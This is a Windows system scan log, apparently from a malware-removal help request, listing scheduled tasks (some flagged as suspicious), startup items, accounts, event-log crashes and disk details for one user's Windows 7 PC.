CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3959093455-1914111138-4206043169-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\georgepc\AppData\Local\Microsoft\SkyDrive\17.3.1171.0714\amd64\FileSyncApi64.dll (Microsoft Corporation)
==================== Restore Points =========================
06-01-2015 16:46:09 Scheduled Checkpoint
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 18:34 - 2009-06-10 13:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {02E4327D-8276-4DF4-9950-2ACA3F910C02} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-07-23] (Google Inc.)
Task: {2AED3F10-5CCF-42B3-8D6C-AB78C7B3CAFF} - System32\Tasks\dvwgmok => C:\Users\georgepc\AppData\Local\Temp\spgcdak.exe <==== ATTENTION
Task: {3FAA4E53-36FB-406A-97F0-F5C056C1A125} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-07-23] (Google Inc.)
Task: {424F2418-3CE7-46FD-BAC1-DE3B79F6AFBA} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-11-11] (Microsoft Corporation)
Task: {49D42AE4-7E9B-468D-B927-6A9B7E97F311} - System32\Tasks\Microsoft Office 15 Sync Maintenance for GeorgePan-PC-georgepc GeorgePan-PC => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-11-04] (Microsoft Corporation)
Task: {5357BD43-1F7F-4064-A44E-6E17F04857DA} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-11-04] (Microsoft Corporation)
Task: {6CBACCAD-195E-40FC-83A3-930A5DAA7BD8} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2014-01-17] ()
Task: {72DBB58A-C0A2-49F8-A755-6FE7A9A2FF47} - System32\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001 => C:\Users\georgepc\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe [2014-12-21] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {C16CD23B-3616-4B8D-88C8-CFAE033F2CF7} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {DE8240FD-BA3C-48D6-9375-DF6775FBA7AA} - System32\Tasks\Security Center Update - 3401159158 => C:\Users\georgepc\AppData\Roaming\Siegazsi\kaxynek.exe <==== ATTENTION
Task: {E5058AA4-D140-4DCC-9FB8-05A2BC093850} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [2014-01-17] ()
Task: {EF1E168D-5FDB-400A-9F32-34F2B03901CB} - System32\Tasks\0614aUpdateInfo => C:\ProgramData\Avg_Update_0614a\0614a_AVG-Secure-Search-Update.exe [2014-06-19] ()
Task: {FFFC73B7-4DDD-4A6B-87AE-6F90D21D9DF9} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\0614aUpdateInfo.job => C:\ProgramData\Avg_Update_0614a\0614a_AVG-Secure-Search-Update.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3959093455-1914111138-4206043169-1001.job => C:\Users\georgepc\AppData\Local\Citrix\GoToMeeting\2130\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Security Center Update - 3401159158.job => C:\Users\georgepc\AppData\Roaming\Siegazsi\kaxynek.exe <==== ATTENTION
==================== Loaded Modules (whitelisted) =============
2014-06-03 17:20 - 2014-01-07 16:48 - 00117536 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-08-02 13:47 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2014-10-24 02:11 - 2014-09-23 05:36 - 08897696 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2014-02-19 15:51 - 2014-02-19 15:51 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2013-11-02 21:19 - 2006-03-17 16:56 - 00290816 _____ () \\DG4F5WV1\WINCSI\CSA\vc6-re200l.dll
2015-01-06 14:55 - 2013-11-14 18:13 - 00081920 _____ () C:\Users\georgepc\AppData\Local\Temp\FileCabinet_CS\cs_20150106_145507\EN-US\cscabsv.dll.mui
2015-01-06 14:55 - 2013-11-14 17:43 - 00881152 _____ () C:\Users\georgepc\AppData\Local\temp\FileCabinet_CS\cs_20150106_145507\fc_condll.dll
2015-01-06 14:55 - 2013-11-14 17:43 - 00266240 _____ () C:\Users\georgepc\AppData\Local\temp\FileCabinet_CS\cs_20150106_145507\en-US\fc_condll.dll.mui
2013-11-02 21:19 - 2010-03-16 08:40 - 01063424 _____ () \\DG4F5WV1\WinCSI\CSA\Wcis_c.dll
2013-11-02 21:18 - 2008-11-13 12:59 - 00995328 _____ () \\DG4F5WV1\WINCSI\CSA\condll.dll
2014-09-21 04:27 - 2014-11-23 06:53 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2014-09-21 04:27 - 2014-11-23 06:53 - 00316576 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream32.dll
2015-01-06 15:39 - 2013-11-14 18:18 - 00009728 _____ () C:\Users\georgepc\AppData\Local\Temp\FileCabinet_CS_Addin\cs_20150106_153914\EN-US\cab_addin.dll.mui
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^CS Connect Background Services.lnk => C:\Windows\pss\CS Connect Background Services.lnk.CommonStartup
MSCONFIG\startupreg: AthBtTray => "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe"
MSCONFIG\startupreg: AtherosBtStack => "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe"
MSCONFIG\startupreg: IAStorIcon => "C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
MSCONFIG\startupreg: kenxoil => rundll32 "C:\Users\georgepc\AppData\Local\kenxoil.dll",kenxoil
MSCONFIG\startupreg: LogMeIn GUI => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
MSCONFIG\startupreg: RtHDVBg => "C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe" /MAXX5REC
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
========================= Accounts: ==========================
Administrator (S-1-5-21-3959093455-1914111138-4206043169-500 - Administrator - Enabled) => C:\Users\Administrator
GeorgePan (S-1-5-21-3959093455-1914111138-4206043169-1000 - Administrator - Disabled) => C:\Users\GeorgePan
georgepc (S-1-5-21-3959093455-1914111138-4206043169-1001 - Administrator - Enabled) => C:\Users\georgepc
Guest (S-1-5-21-3959093455-1914111138-4206043169-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
Name: Dell Wireless 1703 802.11b/g/n (2.4GHz)
Description: Dell Wireless 1703 802.11b/g/n (2.4GHz)
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Atheros Communications Inc.
Service: athr
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: Dell Wireless 1703 Bluetooth
Description: Dell Wireless 1703 Bluetooth
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Atheros Communications
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: =========================
Application errors:
==================
Error: (01/07/2015 00:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc96f
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0040b56c
Faulting process id: 0x22f4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (01/07/2015 11:53:14 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 5BDD.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 5BDD.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x3b48
Faulting application start time: 0x5BDD.tmp0
Faulting application path: 5BDD.tmp1
Faulting module path: 5BDD.tmp2
Report Id: 5BDD.tmp3
Error: (01/07/2015 11:25:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 55F3.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 55F3.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x157c
Faulting application start time: 0x55F3.tmp0
Faulting application path: 55F3.tmp1
Faulting module path: 55F3.tmp2
Report Id: 55F3.tmp3
Error: (01/07/2015 10:03:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 150C.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 150C.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x3058
Faulting application start time: 0x150C.tmp0
Faulting application path: 150C.tmp1
Faulting module path: 150C.tmp2
Report Id: 150C.tmp3
Error: (01/07/2015 09:44:20 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 5314.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Faulting module name: 5314.tmp, version: 0.0.0.0, time stamp: 0x54abbc39
Exception code: 0xc0000005
Fault offset: 0x00001509
Faulting process id: 0x20e0
Faulting application start time: 0x5314.tmp0
Faulting application path: 5314.tmp1
Faulting module path: 5314.tmp2
Report Id: 5314.tmp3
Error: (01/07/2015 06:53:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4ce7a46b
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x0011fb5c
Faulting process id: 0x1be4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (01/07/2015 06:13:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 9DD8.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: 9DD8.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x34a8
Faulting application start time: 0x9DD8.tmp0
Faulting application path: 9DD8.tmp1
Faulting module path: 9DD8.tmp2
Report Id: 9DD8.tmp3
Error: (01/07/2015 06:13:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: 7ED1.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: 7ED1.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x36e8
Faulting application start time: 0x7ED1.tmp0
Faulting application path: 7ED1.tmp1
Faulting module path: 7ED1.tmp2
Report Id: 7ED1.tmp3
Error: (01/07/2015 05:51:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DFF2.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: DFF2.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x348c
Faulting application start time: 0xDFF2.tmp0
Faulting application path: DFF2.tmp1
Faulting module path: DFF2.tmp2
Report Id: DFF2.tmp3
Error: (01/07/2015 05:51:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BDEF.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Faulting module name: BDEF.tmp, version: 0.0.0.0, time stamp: 0x54986f74
Exception code: 0xc0000005
Fault offset: 0x00002496
Faulting process id: 0x2478
Faulting application start time: 0xBDEF.tmp0
Faulting application path: BDEF.tmp1
Faulting module path: BDEF.tmp2
Report Id: BDEF.tmp3
System errors:
=============
Error: (01/07/2015 01:39:33 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 01:35:08 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 01:02:58 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 00:01:58 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 00:01:02 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:43:19 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:24:34 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:13:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 11:07:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Error: (01/07/2015 10:25:29 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 80.
Microsoft Office Sessions:
=========================
Error: (01/07/2015 00:12:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.174964a5bc96fMSHTML.dll11.0.9600.17496546ff2f9c00000fd0040b56c22f401d02ab5ad96f9e2C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll75834fb4-96a9-11e4-a242-3417eba71c52
Error: (01/07/2015 11:53:14 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 5BDD.tmp0.0.0.054abbc395BDD.tmp0.0.0.054abbc39c0000005000015093b4801d02ab39249a5d3C:\Users\georgepc\AppData\Local\Temp\5BDD.tmpC:\Users\georgepc\AppData\Local\Temp\5BDD.tmpd05a2a7f-96a6-11e4-a242-3417eba71c52
Error: (01/07/2015 11:25:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 55F3.tmp0.0.0.054abbc3955F3.tmp0.0.0.054abbc39c000000500001509157c01d02aafc0d021c6C:\Users\georgepc\AppData\Local\Temp\55F3.tmpC:\Users\georgepc\AppData\Local\Temp\55F3.tmpfed98251-96a2-11e4-a242-3417eba71c52
Error: (01/07/2015 10:03:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 150C.tmp0.0.0.054abbc39150C.tmp0.0.0.054abbc39c000000500001509305801d02aa4481262a0C:\Users\georgepc\AppData\Local\Temp\150C.tmpC:\Users\georgepc\AppData\Local\Temp\150C.tmp86b93fa6-9697-11e4-a242-3417eba71c52
Error: (01/07/2015 09:44:20 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 5314.tmp0.0.0.054abbc395314.tmp0.0.0.054abbc39c00000050000150920e001d02aa18f9bb08dC:\Users\georgepc\AppData\Local\Temp\5314.tmpC:\Users\georgepc\AppData\Local\Temp\5314.tmpce957c14-9694-11e4-a242-3417eba71c52
Error: (01/07/2015 06:53:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.174964ce7a46bMSHTML.dll11.0.9600.17496546ff2f9c00000fd0011fb5c1be401d02a896999f715C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlle48b86cd-967c-11e4-a242-3417eba71c52
Error: (01/07/2015 06:13:49 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 9DD8.tmp0.0.0.054986f749DD8.tmp0.0.0.054986f74c00000050000249634a801d02a84282c8f0bC:\Users\georgepc\AppData\Local\Temp\9DD8.tmpC:\Users\georgepc\AppData\Local\Temp\9DD8.tmp65db7b4c-9677-11e4-a242-3417eba71c52
Error: (01/07/2015 06:13:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: 7ED1.tmp0.0.0.054986f747ED1.tmp0.0.0.054986f74c00000050000249636e801d02a842341571aC:\Users\georgepc\AppData\Local\Temp\7ED1.tmpC:\Users\georgepc\AppData\Local\Temp\7ED1.tmp6118bac0-9677-11e4-a242-3417eba71c52
Error: (01/07/2015 05:51:09 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: DFF2.tmp0.0.0.054986f74DFF2.tmp0.0.0.054986f74c000000500002496348c01d02a80fddaaa03C:\Users\georgepc\AppData\Local\Temp\DFF2.tmpC:\Users\georgepc\AppData\Local\Temp\DFF2.tmp3b899644-9674-11e4-a242-3417eba71c52
Error: (01/07/2015 05:51:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: BDEF.tmp0.0.0.054986f74BDEF.tmp0.0.0.054986f74c000000500002496247801d02a80f8786d45C:\Users\georgepc\AppData\Local\Temp\BDEF.tmpC:\Users\georgepc\AppData\Local\Temp\BDEF.tmp367aa9af-9674-11e4-a242-3417eba71c52
==================== Memory info ===========================
Processor: Intel® Core i7-4790 CPU @ 3.60GHz
Percentage of memory in use: 48%
Total physical RAM: 8143.23 MB
Available physical RAM: 4219.92 MB
Total Pagefile: 16284.63 MB
Available Pagefile: 11587.27 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:907.25 GB) (Free:818.52 GB) NTFS
Drive i: (WDO_MEDIA64) (Removable) (Total:14.89 GB) (Free:14.6 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: 0ADE5109)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=24.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=907.3 GB) - (Type=07 NTFS)
========================================================
Disk: 5 (MBR Code: Windows 7 or 8) (Size: 14.9 GB) (Disk ID: 00000000)
Partition: GPT Partition Type.
==================== End Of Log ============================
IDTool log
Infection Detection Tool v1.6 - Nathan Scott
--------------------------------------------
Date/Time: 1/7/2015 1:50:30 PM
Operating System: Windows 7
Service Pack: Service Pack 1
Version Number: 6.1
Product Type: Workstation
--------------------------------------------
[Detected Flags]